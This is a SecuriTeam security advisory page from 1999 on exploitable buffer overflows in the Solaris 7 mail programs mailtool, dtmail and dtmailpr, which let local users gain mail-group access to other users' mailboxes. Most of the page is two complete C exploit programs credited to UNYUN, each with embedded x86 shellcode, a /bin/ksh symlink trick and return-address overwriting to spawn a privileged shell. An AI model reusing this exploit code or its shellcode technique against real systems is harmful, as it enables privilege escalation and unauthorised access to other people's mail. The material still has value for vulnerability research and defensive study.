Security News -  Security Reviews -   Exploits -  Tools -  UNIX Focus -  Windows Focus
Ask the Team  Mailing Lists  Advertising Info  Advisories  About SecuriTeam  Blogs Brought to you by: Suppliers of: Website Testing Tools Network Testing Tools Software Testing Tools SecuriTeam in Your Inbox New vulnerability? New tool? Tell us (Our PGP key). CanSecWest 2012 2nd Annual Cyber Security Hack In Paris	Solaris7 dtmail/dtmailpr/mailtool exploitable buffer overflow 29 Nov. 1999    Summary The mailer programs (mailtool and dtmail) and mail message print filter (dtmailpr), which are installed on Solaris7, have exploitable buffer overflows. These programs are sgid (mail group) programs, meaning that a local user can obtain mail group privileges. The mail files are generated with 660 permissions, so any user can also read/write other user's mail files.   Credit: The information and exploit codes have been provided by: UNYUN. Website Security Scan Code Vulnerability Test Network Assessment Tool Detect hidden vulnerabilities Exhaustive automated testing Real-time, continuous security Get guidance from professionals of internal or 3rd party code. scanning for your entire network    Details Protect your website! Use an External Vulnerability Scanner! Nothing to install. First report in 1 hour! www.beyondsecurity.com/vulnerability-scanner Vulnerable systems: Sun Solaris 7.0 The following tools are vulnerable to exploitable buffer overflows: 1) mailtool This is usually used on the OpenWindow environment. There is a problem on the handling of "Content-Type:" For example, Content-Type: image/aaaaaaaa long 'a' aaaaaa; name="test.gif" The mailtool overflows if you choose an e-mail that contains such "Content-Type". If root choose an e-mail that is written the exploit code, a local user who has mail gid can obtain root privilege. 2) dtmail This is usually used on the CDE. If the long string is specified with "-f" option, dtmail overflows. This overflow is exploitable very easy. You can confirm EIP=0x41414141 when you specify a string that looks like "aaaaaa?aaa". 3) dtmailpr dtmailpr is mail message print filter program. This program overflows "-f" option, too. You can also confirm EIP=0x41414141 with long "aaaaaaaa?aaa". ----- /*===============================================================    Solaris mailtool exploit for Solaris7 Intel Edition    The Shadow Penguin Security (http://shadowpenguin.backsection.net)    Written by UNYUN  (shadowpenguin@backsection.net)    Descripton:      Local user can read/write any user's mailbox    Usage:      setenv DISPLAY yourdisply      gcc ex_mailtool.c      ./a.out /var/mail/[any user]      - Choice "exploit@localhost" mail   =============================================================== */ #include <stdio.h> #define FAKEADR 96 #define FAKEOFS 0x1000 #define RETADR  84 #define RETOFS  0x1224 #define EXPADR  300 #define NOP     0x90 #define MAXBUF  2000 #define DIR     "/usr/openwin/bin" #define HEAD \ "From exploit@localhost Fri Nov 26 00:01 JST 1999\n"\ "Content-Type: multipart/mixed; "\ "boundary=\"VGh1LCAyNSBOb3YgMTk5OSAyMjozOTo1MSArMDkwMA==\"\n"\ "Content-Length: 340\n\n"\ "--VGh1LCAyNSBOb3YgMTk5OSAyMjozOTo1MSArMDkwMA==\n"\ "Content-Type: image/%s; name=\"test.gif\"\n"\ "Content-Disposition: attachment;\n"\ " filename=\"test.gif\"\n"\ "Content-Transfer-Encoding: base64\n\n"\ "IA==\n\n"\ "--VGh1LCAyNSBOb3YgMTk5OSAyMjozOTo1MSArMDkwMA==--\n\n" unsigned long get_sp(void) {   __asm__(" movl %esp,%eax "); } char exploit_code[2000] = "\xeb\x1c\x5e\x33\xc0\x33\xdb\xb3\x08\xfe\xc3\x2b\xf3\x88\x06" "\x6a\x06\x50\xb0\x88\x9a\xff\xff\xff\xff\x07\xee\xeb\x06\x90" "\xe8\xdf\xff\xff\xff\x55\x8b\xec\x83\xec\x08\xeb\x5d\x33\xc0" "\xb0\x3a\xfe\xc0\xeb\x16\xc3\x33\xc0\x40\xeb\x10\xc3\x5e\x33" "\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88\x7e\x06\xeb\x05\xe8\xec" "\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f\xc3\x5e\x33\xc0\x89" "\x76\x08\x88\x46\x07\x33\xd2\xb2\x06\x02\xd2\x89\x04\x16\x50" "\x8d\x46\x08\x50\x8b\x46\x08\x50\xe8\xb5\xff\xff\xff\x33\xd2" "\xb2\x06\x02\xd2\x03\xe2\x6a\x01\xe8\xaf\xff\xff\xff\x83\xc4" "\x04\xe8\xc9\xff\xff\xff/tmp/xx"; main(int argc, char *argv[]) {     static char     buf[MAXBUF];     FILE        *fp;     unsigned int    i,ip,sp;     if (argc!=2){         printf("usage : %s mailbox\n",argv[0]);         exit(1);     }     putenv("LANG=");     sp=get_sp();     system("ln -s /bin/ksh /tmp/xx");     printf("esp  = 0x%x\n",sp);     memset(buf,NOP,MAXBUF);     buf[MAXBUF-1]=0;     ip=sp-FAKEOFS;     printf("fake = 0x%x\n",ip);     buf[FAKEADR  ]=ip&0xff;     buf[FAKEADR+1]=(ip>>8)&0xff;     buf[FAKEADR+2]=(ip>>16)&0xff;     buf[FAKEADR+3]=(ip>>24)&0xff;     ip=sp-RETOFS;     printf("eip  = 0x%x\n",ip);     buf[RETADR  ]=ip&0xff;     buf[RETADR+1]=(ip>>8)&0xff;     buf[RETADR+2]=(ip>>16)&0xff;     buf[RETADR+3]=(ip>>24)&0xff;     strncpy(buf+EXPADR,exploit_code,strlen(exploit_code));     if ((fp=fopen(argv[1],"ab"))==NULL){         printf("Can not write '%s'\n",argv[1]);         exit(1);     }     fprintf(fp,HEAD,buf);     fclose(fp);     printf("Exploit mail has been added.\n");     printf("Choice \"exploit@localhost\" mail.\n");     sprintf(buf,"cd %s; mailtool",DIR);     system(buf); } ----- /*===============================================================    Solaris dtmailpr exploit for Solaris7 Intel Edition    The Shadow Penguin Security (http://shadowpenguin.backsection.net)    Written by UNYUN  (shadowpenguin@backsection.net)    Descripton:      Local user can read/write any user's mailbox   =============================================================== */ #include <stdio.h> #define RETADR  1266 #define RETOFS  0x1d88 #define EXPADR  300 #define NOP 0x90 #define MAXBUF  2000 unsigned long get_sp(void) {   __asm__(" movl %esp,%eax "); } char exploit_code[2000] = "\xeb\x1c\x5e\x33\xc0\x33\xdb\xb3\x08\xfe\xc3\x2b\xf3\x88\x06" "\x6a\x06\x50\xb0\x88\x9a\xff\xff\xff\xff\x07\xee\xeb\x06\x90" "\xe8\xdf\xff\xff\xff\x55\x8b\xec\x83\xec\x08\xeb\x5d\x33\xc0" "\xb0\x3a\xfe\xc0\xeb\x16\xc3\x33\xc0\x40\xeb\x10\xc3\x5e\x33" "\xdb\x89\x5e\x01\xc6\x46\x05\x07\x88\x7e\x06\xeb\x05\xe8\xec" "\xff\xff\xff\x9a\xff\xff\xff\xff\x0f\x0f\xc3\x5e\x33\xc0\x89" "\x76\x08\x88\x46\x07\x33\xd2\xb2\x06\x02\xd2\x89\x04\x16\x50" "\x8d\x46\x08\x50\x8b\x46\x08\x50\xe8\xb5\xff\xff\xff\x33\xd2" "\xb2\x06\x02\xd2\x03\xe2\x6a\x01\xe8\xaf\xff\xff\xff\x83\xc4" "\x04\xe8\xc9\xff\xff\xff/tmp/xx"; main() {     static char     buf[MAXBUF+1000];     FILE        *fp;     unsigned int    i,ip,sp;     putenv("LANG=");     sp=get_sp();     system("ln -s /bin/ksh /tmp/xx");     printf("esp  = 0x%x\n",sp);     memset(buf,NOP,MAXBUF);     ip=sp-RETOFS;     printf("eip  = 0x%x\n",ip);     buf[RETADR  ]=ip&0xff;     buf[RETADR+1]=(ip>>8)&0xff;     buf[RETADR+2]=(ip>>16)&0xff;     buf[RETADR+3]=(ip>>24)&0xff;     strncpy(buf+EXPADR,exploit_code,strlen(exploit_code));     buf[MAXBUF-1]=0;     execl("/usr/dt/bin/dtmailpr","dtmailpr","-f",buf,0); }  Comments: blog comments powered by Disqus	All Sections Security News Unix focus Exploits Tools Windows focus Security Reviews  Related Articles Microsoft Windows shmedia.dll Division By Zero, Explore.exe DOS Exploit IGSS 8 ODBC Server Multiple Remote Uninitialized Pointer Free DoS Progea Movicon TCPUploadServer Remote Exploit Trango Broadband Wireless Rogue SU Authentication Bug Exposing HMS HICP Protocol and Intellicom NetBiterConfig.exe Remote Buffer Overflow Family Connections Multiple Remote Vulnerabilities VideoCache vccleaner Root Vulnerability QuickHeal Antivirus 2010 Local Privilege Escalation DubSite CMS Cross Site Request Forgery Vulnerability SonicWall Global Management System XSS Vulnerability Sonicwall NSA E7500 XSS Vulnerability Juniper Security Threat Response Manager XSS Vulnerability Hacking CSRF Tokens using CSS History Hack Sun Java System Identiy Manager Users Enumeration Microsoft Internet Explorer XML Buffer Overflow (Exploit)  Featured Articles RealNetworks RealPlayer Malformed AAC File Parsing Code Execution Vulnerability ProFTPD Response Pool Use-After-Free Code Execution Vulnerability HP Data Protector Notebook Extension LogClientInstallation SQL Injection Vulnerabilty GE Proficy Historian ihDataArchiver.exe Trusted Header Size Code Execution Vulnerability Novell ZENWorks Software Packaging Antique ActiveX Control Code Execution Vulnerability Adobe Reader U3D IFF RGBA Parsing Code Execution Vulnerability Adobe Reader U3D PCX Parsing Code Execution Vulnerability
	Security News - Security Reviews - Exploits - Tools - UNIX Focus - Windows Focus - Blogs - CVEs

Copyright © 1998-2011 Beyond Security® All rights reserved.
Terms of Use Site Privacy Statement.
SecuriTeam™ is a trademark of Beyond Security®